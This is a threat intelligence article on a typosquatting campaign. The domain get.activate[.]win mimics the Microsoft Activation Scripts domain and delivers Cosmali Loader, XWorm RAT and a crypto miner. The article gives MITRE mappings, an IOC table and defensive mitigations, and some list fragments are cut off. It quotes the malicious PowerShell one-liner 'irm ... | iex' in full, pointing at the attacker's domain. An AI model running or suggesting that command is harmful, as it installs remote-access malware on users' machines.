A clever typosquatting campaign is exploiting users of an unofficial but popular open-source tool, Microsoft Activation Scripts (MAS), to distribute malware. Researchers reported on December 26, 2025, that threat actors registered a domain, get.activate[.]win, that mimics the legitimate MAS domain by omitting a single letter. Users who make this common typo while executing the activation script in PowerShell are unknowingly infected with Cosmali Loader. This malware then deploys secondary payloads, including the XWorm Remote Access Trojan (RAT), granting attackers full remote control, and cryptocurrency mining software. The incident highlights the inherent risks of using grey-area tools and the effectiveness of typosquatting as a malware delivery vector.
The attack preys on human error. The legitimate command to run the MAS script involves invoking a PowerShell command to download and execute a script from get.activated.win. The attackers registered get.activate.win (missing the 'd').
irm https://get.activate.win | iex, they are not connecting to the official MAS project but to the attacker's server.An unusual aspect of this campaign is that some victims reported receiving a pop-up window that stated, "You are infected with Cosmali Loader malware because you mistyped the domain name," and advised a full Windows reinstall. Security experts speculate this message was not from the attackers but from a vigilante hacker or researcher who compromised the malware's insecure command-and-control (C2) server and used it to warn victims.
T1204.002 - User Execution): The user voluntarily executes the malicious command in PowerShell.T1036.005 - Match Legitimate Name or Location): The domain get.activate[.]win is designed to look nearly identical to the legitimate one, tricking the user.T1105): The irm (Invoke-RestMethod) command downloads the initial malware script from the malicious domain.T1059.001 - PowerShell): The entire attack is initiated and executed via PowerShell, a powerful tool often abused by malware.While targeting users of a legally questionable tool, the impact can still be severe. Once infected with XWorm RAT, the victim's machine is completely compromised. The attacker can:
| Type | Value | Description |
|---|---|---|
| domain | get.activate[.]win |
The malicious typosquatted domain used to distribute the malware. |
get.activate[.]win. This is a high-fidelity indicator of compromise. This is an application of D3-UA: URL Analysis.irm or iex fetching scripts from suspicious or unknown domains.Educate users about the dangers of typosquatting and the risks of using unauthorized software activation tools.
Use DNS filtering and web security gateways to block access to known malicious and typosquatted domains.
Mapped D3FEND Techniques:
Use PowerShell Constrained Language Mode or other application control mechanisms to prevent the execution of arbitrary scripts.
Mapped D3FEND Techniques:
To proactively block this attack vector, organizations should use a DNS filtering service or web security gateway that maintains a blocklist of known malicious and typosquatted domains. The domain get.activate[.]win should be immediately added to this list. These services can prevent the initial PowerShell command (irm) from ever reaching the attacker's server, breaking the infection chain at the earliest possible stage. This is a highly effective, low-overhead control that protects against a wide range of phishing and malware delivery campaigns, not just this specific one targeting MAS users.
Harden PowerShell configurations on user endpoints to prevent the execution of untrusted scripts. Deploy PowerShell Constrained Language Mode via Group Policy, which severely limits the commands and scripts that can be run. This would prevent the iex (Invoke-Expression) part of the attack from executing the downloaded malware script. Additionally, enforce a PowerShell execution policy of 'AllSigned' or 'RemoteSigned' to prevent arbitrary scripts from the internet from running. This hardening measure directly targets the execution phase of the attack and is a best practice for securing Windows environments against fileless malware and living-off-the-land attacks.
While not a technical control in the same vein, the most fundamental mitigation is strong user education and acceptable use policies. Organizations must clearly prohibit the use of unauthorized software, cracks, and activation tools. Conduct security awareness training that specifically covers the dangers of typosquatting and social engineering. Explain that such tools are a primary vector for malware like Cosmali Loader and XWorm RAT. A user who understands the risk is less likely to seek out and execute these commands in the first place, thus avoiding the threat entirely. This cultural and policy-based control is the first line of defense.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats